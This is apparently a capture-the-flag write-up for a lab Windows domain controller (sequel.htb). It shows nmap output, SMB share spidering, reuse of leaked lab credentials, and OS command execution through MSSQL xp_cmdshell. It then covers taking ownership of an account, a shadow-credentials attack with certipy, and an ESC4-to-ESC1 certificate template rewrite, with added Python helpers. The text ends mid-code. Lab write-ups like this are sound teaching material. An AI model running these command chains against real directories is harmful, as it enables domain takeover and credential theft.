
USER

nmap scan results:

┌──(hacker㉿kali)-[~/Desktop]
└─$ nmap -sC -sV -Pn 10.10.11.51
Starting Nmap 7.94 ( https://nmap.org ) at 2025-01-17 11:13 CST
Nmap scan report for 10.10.11.51
Host is up (0.065s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
| root-servers
| nstld
|_ verisign-grs
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-17 02:58:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-17T03:00:15+00:00; -15m47s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-17T03:00:15+00:00; -15m47s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-17T01:50:42
|_Not valid after: 2055-01-17T01:50:42
|_ssl-date: 2025-01-17T03:00:16+00:00; -15m46s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-17T03:00:16+00:00; -15m46s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-17T03:00:15+00:00; -15m47s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.94%I=7%D=1/17%Time=6789CB08%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,6B,"\0i\0\x06\x85\x03\0\x01\0\0\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\0\0\x06\0\x01\0\0\x01\x87\0@\x01a\x0croot-servers\
SF:x03net\0\x05nstld\x0cverisign-grs\x03com\0x\xb39\x92\0\0\x07\x08\0\0\x0
SF:3\x84\0\t:\x80\0\x01Q\x80")%r(DNSStatusRequestTCP,E,"\0\x0c\0\0\x90\x02
SF:\0\0\0\0\0\0\0\0");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -15m46s, deviation: 0s, median: -15m47s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-17T02:59:40
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.48 seconds

Logging in with the given credentials rose : KxEPkKe6R8su, netexec's spider_plus module can enumerate and download the contents of the SMB shares (note the default MAX_FILE_SIZE of 50 KB: files above that size are listed but not downloaded):

$ netexec smb 10.10.11.51 -u rose -p KxEPkKe6R8su -M spider_plus -o DOWNLOAD_FLAG=True

SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SPIDER_PLUS 10.10.11.51 445 DC01 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.51 445 DC01 [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.11.51 445 DC01 [*] STATS_FLAG: True
SPIDER_PLUS 10.10.11.51 445 DC01 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.51 445 DC01 [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.51 445 DC01 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.51 445 DC01 [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
.......

One of the downloaded xlsx files holds four sets of credentials. Among them, sa is the built-in sysadmin login of the MSSQL instance (a SQL login rather than a domain account, hence --local-auth below), so we can log in and enable xp_cmdshell to run OS commands; nxc's -x does both steps in one go. Reading the MSSQL setup configuration file reveals:
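Added example, not from the original write-up: a stdlib-only reader for the kind of xlsx sheet spider_plus pulls down. It shows why `grep` on the raw file finds nothing (an xlsx is a zip, and cell text lives in xl/sharedStrings.xml, referenced by index from the sheet XML) and then pairs the username and password columns by header. The workbook it builds and the names and passwords inside it are constructed samples, not the box's file.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": MAIN_NS}


def build_sample_xlsx(rows):
    """Write a minimal .xlsx: a zip holding one worksheet plus a shared-string table.
    Real workbooks carry more parts ([Content_Types].xml, rels, styles); the reader
    below only needs these two, which is where the cell text actually lives."""
    shared, index, rows_xml = [], {}, []
    for r, row in enumerate(rows, start=1):
        cells = []
        for c, value in enumerate(row):
            ref = f"{chr(ord('A') + c)}{r}"
            if isinstance(value, (int, float)):
                cells.append(f'<c r="{ref}"><v>{value}</v></c>')                # number: stored inline
            else:
                if value not in index:                                          # text: index into sharedStrings
                    index[value] = len(shared)
                    shared.append(value)
                cells.append(f'<c r="{ref}" t="s"><v>{index[value]}</v></c>')
        rows_xml.append(f'<row r="{r}">{"".join(cells)}</row>')
    sheet = f'<worksheet xmlns="{MAIN_NS}"><sheetData>{"".join(rows_xml)}</sheetData></worksheet>'
    sst = (f'<sst xmlns="{MAIN_NS}" count="{len(shared)}" uniqueCount="{len(shared)}">'
           + "".join(f"<si><t>{escape(s)}</t></si>" for s in shared) + "</sst>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/worksheets/sheet1.xml", sheet)
        z.writestr("xl/sharedStrings.xml", sst)
    return buf.getvalue()


def read_xlsx_rows(data):
    """Read the first worksheet back as lists of strings, resolving t="s" cells
    through xl/sharedStrings.xml."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        shared = []
        if "xl/sharedStrings.xml" in z.namelist():
            for si in ET.fromstring(z.read("xl/sharedStrings.xml")).findall("m:si", NS):
                # one string may be split into several <r><t> runs; concatenate every <t>
                shared.append("".join(t.text or "" for t in si.iter(f"{{{MAIN_NS}}}t")))
        sheet = ET.fromstring(z.read("xl/worksheets/sheet1.xml"))
        rows = []
        for row in sheet.findall(".//m:row", NS):
            cells = []
            for c in row.findall("m:c", NS):
                v = c.find("m:v", NS)
                if v is None:
                    cells.append("")
                elif c.get("t") == "s":
                    cells.append(shared[int(v.text)])
                else:
                    cells.append(v.text)
            rows.append(cells)
    return rows


def find_credentials(rows):
    """Locate username/password columns by header (case-insensitive) and return (user, password) pairs."""
    if not rows:
        return []
    header = [h.strip().lower() for h in rows[0]]
    try:
        u = next(i for i, h in enumerate(header) if h in ("username", "user", "login"))
        p = next(i for i, h in enumerate(header) if "password" in h)
    except StopIteration:
        return []
    return [(r[u], r[p]) for r in rows[1:] if len(r) > max(u, p) and r[u] and r[p]]


# Constructed sample data; these are not the accounts or passwords from the box.
SAMPLE_ROWS = [
    ["First Name", "Last Name", "Email", "Username", "Password"],
    ["Alice", "Example", "alice@example.htb", "alice", "Spring2024!"],
    ["Bob", "Example", "bob@example.htb", "bob", "P@ss&word<1>"],     # exercises XML escaping
    ["Carol", "Example", "carol@example.htb", "carol", 12345],        # numeric password cell
    ["", "", "", "svc_sample", "Svc-Pass-0"],                         # service account, no name
]

if __name__ == "__main__":
    for user, password in find_credentials(read_xlsx_rows(build_sample_xlsx(SAMPLE_ROWS))):
        print(f"{user}:{password}")
```

The same reader works on a real workbook because it only touches the two parts every text-bearing sheet has; formulas, styles and additional sheets are ignored.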

┌──(hacker㉿kali)-[~/Desktop]
└─$ netexec mssql 10.10.11.51 -u sa -p MSSQLP@ssw0rd! --local-auth -x 'type C:\sql2019\ExpressAdv_ENU\sql-Configuration.INI '
MSSQL 10.10.11.51 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.10.11.51 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
MSSQL 10.10.11.51 1433 DC01 [+] Executed command via mssqlexec
MSSQL 10.10.11.51 1433 DC01 [OPTIONS]
MSSQL 10.10.11.51 1433 DC01 ACTION="Install"
MSSQL 10.10.11.51 1433 DC01 QUIET="True"
MSSQL 10.10.11.51 1433 DC01 FEATURES=SQL
MSSQL 10.10.11.51 1433 DC01 INSTANCENAME="SQLEXPRESS"
MSSQL 10.10.11.51 1433 DC01 INSTANCEID="SQLEXPRESS"
MSSQL 10.10.11.51 1433 DC01 RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
MSSQL 10.10.11.51 1433 DC01 AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
MSSQL 10.10.11.51 1433 DC01 AGTSVCSTARTUPTYPE="Manual"
MSSQL 10.10.11.51 1433 DC01 COMMFABRICPORT="0"
MSSQL 10.10.11.51 1433 DC01 COMMFABRICNETWORKLEVEL=""0"
MSSQL 10.10.11.51 1433 DC01 COMMFABRICENCRYPTION="0"
MSSQL 10.10.11.51 1433 DC01 MATRIXCMBRICKCOMMPORT="0"
MSSQL 10.10.11.51 1433 DC01 SQLSVCSTARTUPTYPE="Automatic"
MSSQL 10.10.11.51 1433 DC01 FILESTREAMLEVEL="0"
MSSQL 10.10.11.51 1433 DC01 ENABLERANU="False"
MSSQL 10.10.11.51 1433 DC01 SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
MSSQL 10.10.11.51 1433 DC01 SQLSVCACCOUNT="SEQUEL\sql_svc"
MSSQL 10.10.11.51 1433 DC01 SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
MSSQL 10.10.11.51 1433 DC01 SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
MSSQL 10.10.11.51 1433 DC01 SECURITYMODE="SQL"
MSSQL 10.10.11.51 1433 DC01 SAPWD="MSSQLP@ssw0rd!"
MSSQL 10.10.11.51 1433 DC01 ADDCURRENTUSERASSQLADMIN="False"
MSSQL 10.10.11.51 1433 DC01 TCPENABLED="1"
MSSQL 10.10.11.51 1433 DC01 NPENABLED="1"
MSSQL 10.10.11.51 1433 DC01 BROWSERSVCSTARTUPTYPE="Automatic"
MSSQL 10.10.11.51 1433 DC01 IAcceptSQLServerLicenseTerms=True

WqSZAF6CysDQbGb3 is the password of sql_svc, the domain account the SQL Server service runs as (SQLSVCACCOUNT above), but it does not give us a remote login as sql_svc. Listing the accounts on the DC instead:

└─$ netexec mssql 10.10.11.51 -u sa -p MSSQLP@ssw0rd! --local-auth -x 'net user '                                            
MSSQL 10.10.11.51 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.10.11.51 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
MSSQL 10.10.11.51 1433 DC01 [+] Executed command via mssqlexec
MSSQL 10.10.11.51 1433 DC01 User accounts for \\DC01
MSSQL 10.10.11.51 1433 DC01 -------------------------------------------------------------------------------
MSSQL 10.10.11.51 1433 DC01 Administrator ca_svc Guest
MSSQL 10.10.11.51 1433 DC01 krbtgt michael oscar
MSSQL 10.10.11.51 1433 DC01 rose ryan sql_svc
MSSQL 10.10.11.51 1433 DC01 The command completed successfully.

Trying the same password against these accounts shows that ryan accepts it (password reuse), and ryan can log in and read the user flag directly.

ROOT

The most valuable part of this box is the ROOT privilege escalation. Previously, on Vintage, RBCD abuse was used to obtain a service ticket and reach WMI; this box shows certificate-based authentication, an extended authentication path into Kerberos.

Among the users above there is ca_svc, an account tied to certificate issuance (it is a member of Cert Publishers):

 [+] Response for object: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
LDAP 10.10.11.51 389 DC01 objectClass: top person organizationalPerson user
LDAP 10.10.11.51 389 DC01 cn: Certification Authority
LDAP 10.10.11.51 389 DC01 sn: Authority
LDAP 10.10.11.51 389 DC01 givenName: Certification
LDAP 10.10.11.51 389 DC01 distinguishedName: CN=Certification Authority,CN=Users,DC=sequel,DC=htb
LDAP 10.10.11.51 389 DC01 instanceType: 4
LDAP 10.10.11.51 389 DC01 whenCreated: 20240609171347.0Z
LDAP 10.10.11.51 389 DC01 whenChanged: 20250117145728.0Z
LDAP 10.10.11.51 389 DC01 displayName: Certification Authority
LDAP 10.10.11.51 389 DC01 uSNCreated: 102493
LDAP 10.10.11.51 389 DC01 memberOf: CN=Cert Publishers,CN=Users,DC=sequel,DC=htb
LDAP 10.10.11.51 389 DC01 uSNChanged: 217726
LDAP 10.10.11.51 389 DC01 name: Certification Authority
LDAP 10.10.11.51 389 DC01 objectGUID: 0x3e5e38923701e24c8c89ab65146f03fd
LDAP 10.10.11.51 389 DC01 userAccountControl: 66048
LDAP 10.10.11.51 389 DC01 badPwdCount: 0
LDAP 10.10.11.51 389 DC01 codePage: 0
LDAP 10.10.11.51 389 DC01 countryCode: 0
LDAP 10.10.11.51 389 DC01 badPasswordTime: 133815966012254481
LDAP 10.10.11.51 389 DC01 lastLogoff: 0
LDAP 10.10.11.51 389 DC01 lastLogon: 133815993200535683
LDAP 10.10.11.51 389 DC01 logonHours: 0xffffffffffffffffffffffffffffffffffffffffff
LDAP 10.10.11.51 389 DC01 pwdLastSet: 133815994488660666
LDAP 10.10.11.51 389 DC01 primaryGroupID: 513
LDAP 10.10.11.51 389 DC01 objectSid: 0x010500000000000515000000bd0bb4207c08fa390ad865d047060000
LDAP 10.10.11.51 389 DC01 accountExpires: 0
LDAP 10.10.11.51 389 DC01 logonCount: 2
LDAP 10.10.11.51 389 DC01 sAMAccountName: ca_svc
LDAP 10.10.11.51 389 DC01 sAMAccountType: 805306368
LDAP 10.10.11.51 389 DC01 userPrincipalName: ca_svc@sequel.htb
LDAP 10.10.11.51 389 DC01 servicePrincipalName: sequel.htb/ca_svc.DC01
LDAP 10.10.11.51 389 DC01 objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=sequel,DC=htb
LDAP 10.10.11.51 389 DC01 dSCorePropagationData: 20250117145728.0Z 20250117145728.0Z 20250117145501.0Z 20250117145443.0Z 16010101000000.0Z
LDAP 10.10.11.51 389 DC01 lastLogonTimestamp: 133815989421160719
LDAP 10.10.11.51 389 DC01 msDS-KeyCredentialLink: B:828:000200002000012551AC911785566D92739DD7308F933D2B9A240DC53F84E438EB85475862143E2000027BBF033A98F784BC9BD2A85ED5074C52053A9F7B4F488E3D69D9C0B29BBE689C1B01035253413100080000030000000001000000000000000000000100019543F4AFE802177FAF1218882F7FC2A0BDE09D7B4AF231FAF0C88B2BDC42A8A8CF09B9BA7AB3FBC253E763035C793C028542DB1FA8025CA8600550646066D4135AC4FC57303374855229697C7BF0BE2DC1AB482291A83B5FB8166D7DA9602B923472E6977318A2A8AE9CB2429626B9A54EE5226EDEDC36B3D979408643A24050BCAF9F822536F7B95BBD4526914C594C62F2D2926807F95A6FB884FB5E8136D5D78D9433DD2AECB40458602ACF477B6CA1C423324E4427E01BDF336B316B99911B7464955EC2F2B9274F307D97EA03D4598221C49514533B22994F3B02366B532983A4979D42FFF009A06FEBA4D4DA4542782F229BC06CC8B106903C87977C150100040101000500100006BD8468646F01524B276141D5E3F8E8940200070100080008E0F8C438F068DB01080009E0F8C438F068DB01:CN=Certification Authority,CN=Users,DC=sequel,DC=htb

msDS-KeyCredentialLink stores serialized key material (a public key) that the KDC will accept for certificate-based (PKINIT) authentication of the account. If we can write this attribute, we can add a key pair of our own (the certificate is self-signed; what matters is that the KDC finds our public key on the account, not a chain to the enterprise CA) and then obtain a TGT for the account: the shadow credentials technique. Holding that TGT, we send a U2U (user-to-user, here self-to-self) TGS-REQ. The resulting service ticket is encrypted with our own TGT session key rather than with a long-term key, so we can open it, and its PAC carries a PAC_CREDENTIAL_INFO buffer holding the account's NTLM hash, encrypted with the AS-REP reply key from the PKINIT exchange.
(Note the difference from the password-based flow: with PKINIT the KDC wraps the AS-REP reply key for the requester's public key, or derives it via Diffie-Hellman, so the private key we generated is enough to recover it without ever knowing the password. In the classic flow the reply key is derived from the password, e.g. the NT hash for RC4, so without the password nothing can be decrypted.) That is how the NTLM hash is recovered. It has to be U2U: a normal service ticket is encrypted with the target service's long-term key, which we do not have; in the self-to-self case the ticket key is the TGT session key we already hold.
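Added example (not part of the original write-up, nor certipy's code): a small Python encoder/decoder for the msDS-KeyCredentialLink value, i.e. what certipy shadow writes and what the LDAP dump above shows. It parses the DN-Binary string into its KEYCREDENTIALLINK_BLOB entries, decodes the BCRYPT RSA public-key blob inside the KeyMaterial entry, verifies the KeyID and KeyHash digests, and builds an equivalent value from scratch. The PAGE_VALUE constant is the ca_svc value from the dump above; the 256-byte sample modulus and device ID are constructed placeholders, not a real key pair. The entry layout (length, identifier, value) and the digest rules follow MS-ADTS 2.2.20.6 as I understand them.

```python
import hashlib
import struct

# KEYCREDENTIALLINK_ENTRY identifiers (MS-ADTS 2.2.20.6)
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 1, 2, 3, 4, 5
DEVICE_ID, CUSTOM_KEY_INFO, LAST_LOGON, CREATION_TIME = 6, 7, 8, 9
KEY_USAGE_NGC = 0x01      # "Next Generation Credential": the usage a shadow-credential key claims
KEY_SOURCE_AD = 0x00
RSA1_MAGIC = b"RSA1"      # BCRYPT_RSAPUBLIC_MAGIC


def bcrypt_rsa_public_blob(modulus, exponent=b"\x01\x00\x01"):
    """Encode a public key as BCRYPT_RSAKEY_BLOB: magic, bit length, exponent/modulus/prime sizes, values."""
    header = RSA1_MAGIC + struct.pack("<IIIII", len(modulus) * 8, len(exponent), len(modulus), 0, 0)
    return header + exponent + modulus


def parse_bcrypt_rsa_public_blob(blob):
    """Return (bit_length, exponent, modulus) from a BCRYPT_RSAKEY_BLOB."""
    if blob[:4] != RSA1_MAGIC:
        raise ValueError("KeyMaterial is not an RSA1 public key blob")
    bitlen, cb_exp, cb_mod, _, _ = struct.unpack_from("<IIIII", blob, 4)
    exp = int.from_bytes(blob[24:24 + cb_exp], "big")
    mod = int.from_bytes(blob[24 + cb_exp:24 + cb_exp + cb_mod], "big")
    return bitlen, exp, mod


def _entry(identifier, value):
    # Each entry is: Length (2 bytes, little-endian) | Identifier (1 byte) | Value
    return struct.pack("<HB", len(value), identifier) + value


def build_key_credential_link(key_material, device_id, filetime, owner_dn):
    """Serialise a KEYCREDENTIALLINK_BLOB and wrap it as the DN-Binary string ("B:<hexlen>:<hex>:<dn>")
    that a shadow-credentials tool writes into msDS-KeyCredentialLink."""
    ft = struct.pack("<Q", filetime)
    tail = (_entry(KEY_MATERIAL, key_material)
            + _entry(KEY_USAGE, bytes([KEY_USAGE_NGC]))
            + _entry(KEY_SOURCE, bytes([KEY_SOURCE_AD]))
            + _entry(DEVICE_ID, device_id)
            + _entry(CUSTOM_KEY_INFO, b"\x01\x00")
            + _entry(LAST_LOGON, ft)
            + _entry(CREATION_TIME, ft))
    key_id = hashlib.sha256(key_material).digest()    # KeyID for NGC keys: SHA256 of the KeyMaterial value
    key_hash = hashlib.sha256(tail).digest()           # KeyHash: SHA256 of every entry that follows it
    blob = struct.pack("<I", 0x200) + _entry(KEY_ID, key_id) + _entry(KEY_HASH, key_hash) + tail
    hexblob = blob.hex().upper()
    return f"B:{len(hexblob)}:{hexblob}:{owner_dn}"


def parse_key_credential_link(dn_binary):
    """Parse a DN-Binary msDS-KeyCredentialLink value, check both digests, and decode the public key."""
    tag, hexlen, hexblob, owner_dn = dn_binary.split(":", 3)
    if tag != "B" or int(hexlen) != len(hexblob):
        raise ValueError("malformed DN-Binary value")
    blob = bytes.fromhex(hexblob)
    (version,) = struct.unpack_from("<I", blob, 0)
    entries, off, after_hash = [], 4, None
    while off < len(blob):
        length, ident = struct.unpack_from("<HB", blob, off)
        off += 3
        entries.append((ident, blob[off:off + length]))
        off += length
        if ident == KEY_HASH:
            after_hash = off            # KeyHash covers everything from here to the end
    values = dict(entries)
    material = values[KEY_MATERIAL]
    return {
        "version": version,
        "owner_dn": owner_dn,
        "entries": entries,
        "key_usage": values[KEY_USAGE][0],
        "rsa": parse_bcrypt_rsa_public_blob(material),
        "key_id_ok": values[KEY_ID] == hashlib.sha256(material).digest(),
        "key_hash_ok": after_hash is not None and values[KEY_HASH] == hashlib.sha256(blob[after_hash:]).digest(),
    }


# The value found on ca_svc in the LDAP dump above (copied verbatim).
PAGE_VALUE = "B:828:000200002000012551AC911785566D92739DD7308F933D2B9A240DC53F84E438EB85475862143E2000027BBF033A98F784BC9BD2A85ED5074C52053A9F7B4F488E3D69D9C0B29BBE689C1B01035253413100080000030000000001000000000000000000000100019543F4AFE802177FAF1218882F7FC2A0BDE09D7B4AF231FAF0C88B2BDC42A8A8CF09B9BA7AB3FBC253E763035C793C028542DB1FA8025CA8600550646066D4135AC4FC57303374855229697C7BF0BE2DC1AB482291A83B5FB8166D7DA9602B923472E6977318A2A8AE9CB2429626B9A54EE5226EDEDC36B3D979408643A24050BCAF9F822536F7B95BBD4526914C594C62F2D2926807F95A6FB884FB5E8136D5D78D9433DD2AECB40458602ACF477B6CA1C423324E4427E01BDF336B316B99911B7464955EC2F2B9274F307D97EA03D4598221C49514533B22994F3B02366B532983A4979D42FFF009A06FEBA4D4DA4542782F229BC06CC8B106903C87977C150100040101000500100006BD8468646F01524B276141D5E3F8E8940200070100080008E0F8C438F068DB01080009E0F8C438F068DB01:CN=Certification Authority,CN=Users,DC=sequel,DC=htb"

# Constructed stand-ins for a freshly generated 2048-bit key and a device GUID (not a real key pair).
SAMPLE_MODULUS = bytes((i * 7 + 1) % 256 for i in range(256))
SAMPLE_DEVICE_ID = bytes(range(16))

if __name__ == "__main__":
    info = parse_key_credential_link(PAGE_VALUE)
    bits, exp, _ = info["rsa"]
    print(f"{info['owner_dn']}: RSA-{bits} e={exp} entries={[i for i, _ in info['entries']]} "
          f"KeyID ok={info['key_id_ok']} KeyHash ok={info['key_hash_ok']}")
```

Reading the ca_svc value this way shows the nine entries in the order certipy writes them (KeyID, KeyHash, KeyMaterial, KeyUsage, KeySource, DeviceId, CustomKeyInformation, and two FILETIMEs) and a 2048-bit RSA key with the usual exponent 65537; that public key is exactly what the KDC uses to validate the PKINIT request described above. Defensively, the same parser run over an LDAP export is a cheap way to spot accounts that gained a key they never should have had.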

All of this is packaged in certipy (shadow auto). We need to write ca_svc's msDS-KeyCredentialLink, so we need an account with write access to that object; BloodHound quickly shows that ryan qualifies: ryan has WriteOwner over ca_svc.
Making ryan the owner is what unlocks the rest, because an object's owner implicitly holds WRITE_DAC (and READ_CONTROL) on it: ryan can then edit ca_svc's DACL and grant himself whatever write right the attribute update needs (bloodyAD's add genericAll does that if the write is still refused after the ownership change).

# Kerberos rejects requests whose timestamp is more than 5 minutes off the KDC's clock;
# nmap reported a -15m47s skew, so stop NTP adjustments and align the clock with DC01 first.
sudo timedatectl set-ntp false 
export u=ryan
export p=WqSZAF6CysDQbGb3
# ryan holds WriteOwner on ca_svc: take ownership, which implicitly grants WRITE_DAC on the object
bloodyAD --host sequel.htb -d sequel.htb -u $u -p $p set owner ca_svc ryan
# writes a fresh key pair into ca_svc's msDS-KeyCredentialLink, authenticates with it via PKINIT,
# saves ca_svc.ccache and prints the NT hash recovered through the U2U ticket
certipy-ad shadow auto -u $u@sequel.htb -p $p -dc-ip 10.10.11.51 -ns 10.10.11.51 -target 10.10.11.51 -account ca_svc

certipy-ad shadow auto directly yields ca_svc's NTLM hash; the mechanism is the one described above.

Scan AD CS for vulnerable templates:

# reuse the ca_svc TGT saved by shadow auto; -k selects Kerberos auth, -vulnerable limits the output to misconfigurations
export KRB5CCNAME=$PWD/ca_svc.ccache
certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout

The output shows that the DunderMifflinAuthentication template meets the conditions for ESC4: an account we control (ca_svc, through its Cert Publishers membership) has write access to the template object. Rewriting a few of its attributes (certipy's template command sets the ENROLLEE_SUPPLIES_SUBJECT name flag, a client-authentication EKU, and no manager approval or authorized signatures; it saves the previous configuration to a JSON file first, which is how the template is restored afterwards) turns it into an ESC1 template: our account can then request a certificate naming any other principal, including administrator, use that certificate to obtain a TGT via PKINIT, and recover the NT hash (U2U self-to-self, exactly as before).
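Added example, not from the original write-up or from certipy: a Python checklist that evaluates the ESC1 preconditions from a template's LDAP attributes, plus the ESC4 write check that makes the rewrite possible. The two template dictionaries are constructed: the "before" state is a plausible safe configuration, not the real attributes of DunderMifflinAuthentication, and the "after" state is the shape an ESC4 rewrite leaves behind. The `enabled`, `enroll_rights` and `write_rights` fields are simplified stand-ins for the CA's published-template list and the rights carried in nTSecurityDescriptor.

```python
# EKU OIDs that make a certificate usable for client (Kerberos PKINIT / Schannel) authentication
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}
# msPKI-Certificate-Name-Flag bits
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # requester chooses the subject / SAN
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000     # CA fills the SAN from the requester's own UPN
# msPKI-Enrollment-Flag bits
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # "CA certificate manager approval" required


def allows_client_auth(ekus):
    # an empty EKU list means "all purposes", which also covers client authentication
    return not ekus or bool(CLIENT_AUTH_EKUS & set(ekus))


def esc1_checklist(template, groups):
    """Evaluate every ESC1 precondition for a principal whose group set is `groups`.
    Returns {condition: bool}; ESC1 applies only when every value is True."""
    name_flag = template.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flag = template.get("msPKI-Enrollment-Flag", 0)
    return {
        "published_on_ca": bool(template.get("enabled")),
        "enrollee_supplies_subject": bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "client_auth_eku": allows_client_auth(template.get("pKIExtendedKeyUsage", [])),
        "no_manager_approval": not (enroll_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": template.get("msPKI-RA-Signature", 0) == 0,
        "principal_can_enroll": bool(set(template.get("enroll_rights", [])) & set(groups)),
    }


def is_esc1(template, groups):
    return all(esc1_checklist(template, groups).values())


def failed_conditions(template, groups):
    """Which ESC1 preconditions still block the principal (useful when deciding what an ESC4 rewrite must change)."""
    return sorted(k for k, v in esc1_checklist(template, groups).items() if not v)


def is_esc4(template, groups):
    """ESC4: the principal can rewrite the template object itself (WriteDacl / WriteOwner / WriteProperty)."""
    return bool(set(template.get("write_rights", [])) & set(groups))


# Constructed "before": certificates are issued only for the requester's own UPN, so an enrollee
# cannot pick whom the certificate names. Not the real attributes of DunderMifflinAuthentication.
TEMPLATE_BEFORE = {
    "name": "DunderMifflinAuthentication",
    "enabled": True,
    "msPKI-Certificate-Name-Flag": CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enroll_rights": ["Domain Users"],
    "write_rights": ["Cert Publishers", "Domain Admins"],   # what makes it ESC4 for ca_svc
}

# Constructed "after": the shape an ESC4 rewrite leaves behind so that ESC1 works for anyone.
TEMPLATE_AFTER = {
    **TEMPLATE_BEFORE,
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "enroll_rights": ["Authenticated Users"],
}

if __name__ == "__main__":
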